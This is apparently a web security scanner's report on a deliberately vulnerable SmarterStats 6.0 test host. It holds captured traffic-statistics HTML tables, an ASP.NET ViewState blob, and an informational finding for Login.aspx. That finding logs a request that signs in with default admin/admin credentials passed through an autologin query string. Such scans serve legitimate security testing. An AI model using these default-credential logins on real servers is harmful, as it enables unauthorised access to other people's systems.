<td class='ar percentcol '>
<div class='percent percent0'></div>
527</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
4</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='al '>Win 2000</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
4</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
16</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
23</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='al '>Mac OS 10.6</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
4</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
5</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
148</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='al '>Win 2003</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
21</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
4</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
31</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Other Items (6)</td>
<td class='FooterTotal ar percentcol'>18</td>
<td class='FooterTotal ar percentcol'>15</td>
<td class='FooterTotal ar percentcol'>368</td>
<td class='FooterTotal ar rc percentcolrc'>2</td>
</tr>
<tr class=''>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar percentcol'>70,105</td>
<td class='FooterTotal ar percentcol'>796</td>
<td class='FooterTotal ar percentcol'>81,235</td>
<td class='FooterTotal ar rc percentcolrc'>4,694</td>
</tr>
<tr class='alt'>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar percentcol'>4,381</td>
<td class='FooterAverages ar percentcol'>49</td>
<td class='FooterAverages ar percentcol'>5,077</td>
<td class='FooterAverages ar rc percentcolrc'>293</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Browsers</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="Browsers"> <div class='ReportChart'><img src="/Temp/1d4802d431604203a5254435a7181b01.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Browser</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar '>Hits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>Firefox</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
626</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
508</td>
<td class='ar percentcol '>
<div class='percent percent3'></div>
9,680</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
74</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '>IE</td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
69,210</td>
<td class='ar percentcol '>
<div class='percent percent7'></div>
144</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
70,552</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
4,608</td>
</tr>
<tr >
<td class='ac rank lc'>3</td>

<td class='al '>Bots, Spiders</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
48</td>
<td class='ar percentcol '>
<div class='percent percent2'></div>
54</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
143</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>4</td>

<td class='al '>Unknown</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
52</td>
<td class='ar percentcol '>
<div class='percent percent2'></div>
49</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
63</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>5</td>

<td class='al '>No User Agent <i>(masked)</i></td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
138</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
19</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
144</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
3</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>6</td>

<td class='al '>Google Chrome</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
10</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
8</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
248</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
1</td>
</tr>
<tr >
<td class='ac rank lc'>7</td>

<td class='al '>Safari</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
9</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
7</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
289</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>8</td>

<td class='al '>Opera</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
9</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
4</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
83</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
2</td>
</tr>
<tr >
<td class='ac rank lc'>9</td>

<td class='al '>Netscape</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
2</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
2</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
2</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
0</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>10</td>

<td class='al '>PlayStation Portable</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
1</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
1</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
31</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
0</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar percentcol'>70,105</td>
<td class='FooterTotal ar percentcol'>796</td>
<td class='FooterTotal ar percentcol'>81,235</td>
<td class='FooterTotal ar rc percentcolrc'>4,694</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar percentcol'>7,010</td>
<td class='FooterAverages ar percentcol'>79</td>
<td class='FooterAverages ar percentcol'>8,123</td>
<td class='FooterAverages ar rc percentcolrc'>469</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Monthly Totals</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="ACT_Monthly_Totals"> <div class='ReportChart'><img src="/Temp/91331a080c0148b0bddd5d75991acb5b.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='al lc'>Month</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar '>Hits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='al lc'>October, 2010</td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
70,352</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
1,012</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
84,873</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
4,725</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al'>Total(s)</td>
<td class='FooterTotal ar percentcol'>70,352</td>
<td class='FooterTotal ar percentcol'>1,012</td>
<td class='FooterTotal ar percentcol'>84,873</td>
<td class='FooterTotal ar rc percentcolrc'>4,725</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al'>Average(s)</td>
<td class='FooterAverages ar percentcol'>70,352</td>
<td class='FooterAverages ar percentcol'>1,012</td>
<td class='FooterAverages ar percentcol'>84,873</td>
<td class='FooterAverages ar rc percentcolrc'>4,725</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Weekday Totals</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="ACT_DOW_Totals"> <div class='ReportChart'><img src="/Temp/5bf056fa42644067bd0099f9d59829e2.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='al lc'>Week Day</th><th class='ar '>Page Views</th><th class='ar '>Visits</th><th class='ar '>Hits</th><th class='ar rc'>Bandwidth (MB)</th></tr></thead>
<tbody>
<tr >
<td class='al lc'>Sunday</td>

<td class='ar percentcol '>
<div class='percent percent19'></div>
28,509</td>
<td class='ar percentcol '>
<div class='percent percent20'></div>
109</td>
<td class='ar percentcol '>
<div class='percent percent20'></div>
30,005</td>
<td class='ar percentcol rc'>
<div class='percent percent20'></div>
1,914</td>
</tr>
<tr class="alt">
<td class='al lc'>Monday</td>

<td class='ar percentcol '>
<div class='percent percent26'></div>
37,279</td>
<td class='ar percentcol '>
<div class='percent percent18'></div>
98</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
38,813</td>
<td class='ar percentcol rc'>
<div class='percent percent26'></div>
2,474</td>
</tr>
<tr >
<td class='al lc'>Tuesday</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
116</td>
<td class='ar percentcol '>
<div class='percent percent19'></div>
100</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
1,605</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
11</td>
</tr>
<tr class="alt">
<td class='al lc'>Wednesday</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
120</td>
<td class='ar percentcol '>
<div class='percent percent19'></div>
100</td>
<td class='ar percentcol '>
<div class='percent percent0'></div>
1,454</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
15</td>
</tr>
<tr >
<td class='al lc'>Thursday</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
451</td>
<td class='ar percentcol '>
<div class='percent percent25'></div>
131</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
2,015</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
18</td>
</tr>
<tr class="alt">
<td class='al lc'>Friday</td>

<td class='ar percentcol '>
<div class='percent percent0'></div>
149</td>
<td class='ar percentcol '>
<div class='percent percent23'></div>
123</td>
<td class='ar percentcol '>
<div class='percent percent1'></div>
1,872</td>
<td class='ar percentcol rc'>
<div class='percent percent0'></div>
17</td>
</tr>
<tr >
<td class='al lc'>Saturday</td>

<td class='ar percentcol '>
<div class='percent percent2'></div>
3,481</td>
<td class='ar percentcol '>
<div class='percent percent26'></div>
135</td>
<td class='ar percentcol '>
<div class='percent percent3'></div>
5,471</td>
<td class='ar percentcol rc'>
<div class='percent percent2'></div>
245</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al'>Total(s)</td>
<td class='FooterTotal ar percentcol'>70,105</td>
<td class='FooterTotal ar percentcol'>796</td>
<td class='FooterTotal ar percentcol'>81,235</td>
<td class='FooterTotal ar rc percentcolrc'>4,694</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al'>Average(s)</td>
<td class='FooterAverages ar percentcol'>10,015</td>
<td class='FooterAverages ar percentcol'>113</td>
<td class='FooterAverages ar percentcol'>11,605</td>
<td class='FooterAverages ar rc percentcolrc'>671</td>
</tr>
</tfoot>
</table></div>
<div class="ReportOptionsTitleBar"><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportTitle">Search Engine Breakdown</td><td class="ReportSubTitle">(vilnerable.smarterstats.6.0.host)</td></tr></table></div><div class="ReportOptionSection"><table class="ReportOptionSection"><tr><td class="ReportItemOptionLabel">Date Range:<td><td>10/3/2010 to 10/9/2010</td></tr></table></div></div><div class="Report" id="SEO_Engines"> <div class='ReportChart'><img src="/Temp/8494271a59234d898cdd787b473092ed.jpg" /></div><table class='ReportTable'><thead><tr>
<th class='ac rank lc'>#</th><th class='al '>Search Engine</th><th class='ar rc'>Visits</th></tr></thead>
<tbody>
<tr >
<td class='ac rank lc'>1</td>

<td class='al '>Google</td>

<td class='ar percentcol rc'>
<div class='percent percent26'></div>
3</td>
</tr>
<tr class="alt">
<td class='ac rank lc'>2</td>

<td class='al '>Yandex</td>

<td class='ar percentcol rc'>
<div class='percent percent17'></div>
2</td>
</tr>
</tbody>
<tfoot>
<tr class='alt'>
<td class='FooterTotal lc al' colspan=2>Total(s)</td>
<td class='FooterTotal ar rc percentcolrc'>5</td>
</tr>
<tr class=''>
<td class='FooterAverages lc al' colspan=2>Average(s)</td>
<td class='FooterAverages ar rc percentcolrc'>2</td>
</tr>
</tfoot>
</table></div>
</div>
           <a id="ctl00_MPH_lnkCancel" href="javascript:__doPostBack(&#39;ctl00$MPH$lnkCancel&#39;,&#39;&#39;)"></a>
       |0|hiddenField|__EVENTTARGET||0|hiddenField|__EVENTARGUMENT||5468|hiddenField|__VIEWSTATE|/wEPDwUKMTIyNzU0MjE4NQ8WBh4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlHg9yZXBvcnREaXNwbGF5ZWRnFgJmD2QWAgIBD2QWDAIDD2QWAgIBD2QWAgIBD2QWAmYPZBYIAgEPDxYCHgdWaXNpYmxlaGRkAgMPDxYCHhdDbGllbnRTaWRlU2NyaXB0T25DbGljawUSRW1haWxSZXBvcnRQb3B1cCgpZGQCBQ8PFgIfBAUTRXhwb3J0UmVwb3J0UG9wdXAoKWRkAgcPDxYCHwQFElByaW50UmVwb3J0UG9wdXAoKWRkAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HwNoZAIGDxYCHwNoZAIHD2QWAmYPZBYCAgEPFgIfA2gWAgIBDxYCHgRUZXh0ZWQCCA8WAh8DaGQCCQ9kFgICAQ9kFhwCAw8PFhAeDFNlbGVjdGVkRGF0ZQYAQH4OpTDNCB4HTWluRGF0ZQYAQMr4o+jgBx4HTWF4RGF0ZQYAAGjBKVyhCR4cRW5hYmxlRW1iZWRkZWRCYXNlU3R5bGVzaGVldGgeE0VuYWJsZUVtYmVkZGVkU2tpbnNoHgRTa2luBQxTbWFydGVyVG9vbHMeCENzc0NsYXNzBRJEYXRlUGlja2VyT3ZlcnJpZGUeBF8hU0ICAmQWBmYPFCsACA8WEh8LaB4NT3JpZ2luYWxWYWx1ZQUVMTAvMy8yMDEwIDEyOjAwOjAwIEFNHwkGAABowSlcoQkeDUxhYmVsQ3NzQ2xhc3MFB3JpTGFiZWweF0VuYWJsZUFqYXhTa2luUmVuZGVyaW5naB8MBQxTbWFydGVyVG9vbHMfCmgfCAYAQMr4o+jgBx8GBRMyMDEwLTEwLTAzLTAwLTAwLTAwZBYGHgVXaWR0aBsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpSG92ZXIfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEXJpVGV4dEJveCByaUVycm9yHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlGb2N1c2VkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlFbmFibGVkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8OAoICFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpRW1wdHkfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEHJpVGV4dEJveCByaVJlYWQfDgKCAmQCAQ8PFgQeCEltYWdlVXJsBTIvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9DYWxlbmRhck1vbnRoLmdpZh4NSG92ZXJJbWFnZVVybAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYWAh4Hb25jbGljawU8cmV0dXJuIENhbGVuZGFyUG9wdXAoJGZpbmQoJ2N0bDAwX01QSF9SYWRTdGFydERhdGUnKSwnY2FsJyk7ZAICDxQrAA0PFhwFD1JlbmRlckludmlzaWJsZWcFEUVuYWJsZU11bHRpU2VsZWN0aAUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFBEZvY0QGAMD4DFw1zQgFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFBE1pbkQGAEDK+KPo4AcFDVNlbGVjdGVkRGF0ZXMPBY8BVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuRGF0ZVRpbWVDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjQwLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwAABQ5Sb3dIZWFkZXJJbWFnZQUpL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodC5naWYFEk5hdmlnYXRpb25OZXh0VGV4dGUFA0VSU2gFEk5hdmlnYXRpb25QcmV2VGV4dGUFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFBE1heEQGAABowSlcoQkPFggfDAUMU21hcnRlclRvb2xzHwtoHwpoHxFoZGQWBB8NBQtyY01haW5UYWJsZR8OAgIWBB8NBQxyY090aGVyTW9udGgfDgICZBYEHw0FCnJjU2VsZWN0ZWQfDgICZBYEHw0FCnJjRGlzYWJsZWQfDgICFgQfDQUMcmNPdXRPZlJhbmdlHw4CAhYEHw0FCXJjV2Vla2VuZB8OAgIWBB8NBQdyY0hvdmVyHw4CAhYEHw0FNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8OAgIWBB8NBQlyY1ZpZXdTZWwfDgICZAIHDw8WEB8HBgDA+AxcNc0IHwgGAEDK+KPo4AcfCQYAAGjBKVyhCR8KaB8LaB8MBQxTbWFydGVyVG9vbHMfDQUSRGF0ZVBpY2tlck92ZXJyaWRlHw4CAmQWBmYPFCsACA8WEh8LaB8PBRUxMC85LzIwMTAgMTI6MDA6MDAgQU0fCQYAAGjBKVyhCR8QBQdyaUxhYmVsHxFoHwwFDFNtYXJ0ZXJUb29scx8KaB8IBgBAyvij6OAHHwYFEzIwMTAtMTAtMDktMDAtMDAtMDBkFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpSG92ZXIfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEXJpVGV4dEJveCByaUVycm9yHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlGb2N1c2VkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRNyaVRleHRCb3ggcmlFbmFibGVkHw4CggIWBh8SGwAAAAAAAFlABwAAAB8NBRRyaVRleHRCb3ggcmlEaXNhYmxlZB8OAoICFgYfEhsAAAAAAABZQAcAAAAfDQURcmlUZXh0Qm94IHJpRW1wdHkfDgKCAhYGHxIbAAAAAAAAWUAHAAAAHw0FEHJpVGV4dEJveCByaVJlYWQfDgKCAmQCAQ8PFgQfEwUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYfFAUyL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvMTZ4MTYvQ2FsZW5kYXJNb250aC5naWYWAh8VBTpyZXR1cm4gQ2FsZW5kYXJQb3B1cCgkZmluZCgnY3RsMDBfTVBIX1JhZEVuZERhdGUnKSwnY2FsJyk7ZAICDxQrAA0PFhwFD1JlbmRlckludmlzaWJsZWcFEUVuYWJsZU11bHRpU2VsZWN0aAUWRmFzdE5hdmlnYXRpb25QcmV2VGV4dGUFBEZvY0QGAMD4DFw1zQgFEVZpZXdTZWxlY3RvckltYWdlBSovQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9taXNjL3JpZ2h0Mi5naWYFBE1pbkQGAEDK+KPo4AcFDVNlbGVjdGVkRGF0ZXMPBY8BVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuRGF0ZVRpbWVDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjQwLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwAABQ5Sb3dIZWFkZXJJbWFnZQUpL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodC5naWYFEk5hdmlnYXRpb25OZXh0VGV4dGUFA0VSU2gFEk5hdmlnYXRpb25QcmV2VGV4dGUFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy40MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFBE1heEQGAABowSlcoQkPFggfDAUMU21hcnRlclRvb2xzHwtoHwpoHxFoZGQWBB8NBQtyY01haW5UYWJsZR8OAgIWBB8NBQxyY090aGVyTW9udGgfDgICZBYEHw0FCnJjU2VsZWN0ZWQfDgICZBYEHw0FCnJjRGlzYWJsZWQfDgICFgQfDQUMcmNPdXRPZlJhbmdlHw4CAhYEHw0FCXJjV2Vla2VuZB8OAgIWBB8NBQdyY0hvdmVyHw4CAhYEHw0FNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8OAgIWBB8NBQlyY1ZpZXdTZWwfDgICZAILDxYCHwNoZAINDxYCHwNoZAIPDxYCHwNoZAIRDxYCHwNoZAITDxYCHwNoZAIXDxYCHwNoZAIZDxYCHwNoFgICAQ8QZGQWAGQCGw8WAh8DaGQCHQ8WAh8DaGQCHw8WAh8DaGQCIQ8PFgIfBgUKR2V0IFJlcG9ydGRkAiMPZBYCZg9kFgQCAQ8PFgIfBmRkZAIDDw8WAh8GZGRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYGBRZjdGwwMCRNUEgkUmFkU3RhcnREYXRlBR9jdGwwMCRNUEgkUmFkU3RhcnREYXRlJGNhbGVuZGFyBR9jdGwwMCRNUEgkUmFkU3RhcnREYXRlJGNhbGVuZGFyBRRjdGwwMCRNUEgkUmFkRW5kRGF0ZQUdY3RsMDAkTVBIJFJhZEVuZERhdGUkY2FsZW5kYXIFHWN0bDAwJE1QSCRSYWRFbmREYXRlJGNhbGVuZGFy2i6SqU9sX2UGCANrrGpuPaZ9vy6xkf2p8L7PZhOpOzc=|53|asyncPostBackControlIDs||ctl00$MPH$btnGenerateReport,,ctl00$MPH$btnShowReport,|0|postBackControlIDs|||86|updatePanelIDs||tctl00$BPH$UpdatePanel2,,tctl00$UpdatePanel1,,tctl00$MPH$UpdatePanel1,,tctl00$MPH$UP1,|0|childUpdatePanelIDs|||82|panelsToRefreshIDs||ctl00$BPH$UpdatePanel2,,ctl00$UpdatePanel1,,ctl00$MPH$UpdatePanel1,,ctl00$MPH$UP1,|2|asyncPostBackTimeout||90|70|formAction||frmViewReports.aspx?Custom=False&ReportType=Standard&subReportName=CEO|26|pageTitle||View Report - SmarterStats|51|scriptStartupBlock|ScriptContentNoTags|if (document.ResizeEvent) document.ResizeEvent();
|

5.2. http://vulnerable.smarterstats.6.0.host:9999/Login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Login.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /Login.aspx?shortcutLink=autologin&txtSiteID=admin&txtUser=admin&txtPass=admin HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:28:41 GMT
X-AspNet-Version: 4.0.30319
X-Compressed-By: HttpCompress
Set-Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; path=/; HttpOnly
Set-Cookie: SelectedLanguage=; expires=Sat, 10-Oct-2020 03:28:41 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Connection: Close
Content-Length: 8885



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   SmarterStats Login - SmarterStats
</title>
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


   <script type="text/javascript">
       if (parent.isRoot != null)
           parent.location.href = location.href;
       if (parent.parent.isRoot != null)
           parent.parent.location.href = location.href;
   </script>

<link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Login/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="Login" dir="ltr">
   <form name="aspnetForm" method="post" action="Login.aspx?shortcutLink=autologin&amp;txtSiteID=admin&amp;txtUser=admin&amp;txtPass=admin" id="aspnetForm">
<div>
<input type="hidden" name="__LASTFOCUS" id="__LASTFOCUS" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
